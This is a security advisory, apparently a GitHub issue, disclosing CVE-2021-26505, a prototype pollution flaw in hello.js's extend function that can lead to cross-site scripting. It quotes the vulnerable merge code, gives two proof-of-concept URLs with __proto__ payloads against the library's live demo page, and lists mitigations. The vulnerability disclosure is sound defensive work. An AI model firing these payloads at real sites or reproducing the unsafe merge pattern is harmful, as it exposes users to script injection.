CVE-2021-26505: Prototype Pollution in hello.js · Issue #634 · MrSwitch/hello.js

Abstract

The function hello.utils.extend, defined in file hello.js, introduces a Prototype Pollution vulnerability, which could result in Cross-Site Scripting.

hello.utils = {

// Extend the first object with the properties and methods of the second

extend: function(r /*, a[, b[, …]] */) {

// Get the arguments as an array but ommit the initial item

Array.prototype.slice.call(arguments, 1).forEach(function(a) {

if (Array.isArray® && Array.isArray(a)) {

Array.prototype.push.apply(r, a);

}

else if (r && (r instanceof Object || typeof r === ‘object’) && a && (a instanceof Object || typeof a === ‘object’) && r !== a) {

for (var x in a) {

r[x] = hello.utils.extend(r[x], a[x]);

}

}

else {

if (Array.isArray(a)) {

// Clone it

a = a.slice(0);

}

r = a;

}

});

return r;

}

};

The code on Line 29 has a typical pattern of Prototype Pollution.

r[x] = hello.utils.extend(r[x], a[x]);

The vulnerable lines of code, then, are called on Line 1320, which could allow attackers to pollute the object in JavaScript.

p = _this.merge(_this.param(location.search || ‘’), _this.param(location.hash || ‘’));

Proof of Concepts

As a result, websites, which use the hello.js, might highly likely have Cross-Site Scripting. Take the offical demo of hello.js as an example, the Prototype Pollution could be exploited as follows:

https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22__proto__%22:{%22callback%22:%22alert%22}}
https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22__proto__%22:{%22onbeforescriptexecute%22:%22alert(location.href)%22}}

Suggestion

• Freeze the prototype— use Object.freeze (Object.prototype).
• Require schema validation of JSON input.
• Avoid using unsafe recursive merge functions.
• Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
• As a best practice use Map instead of Object.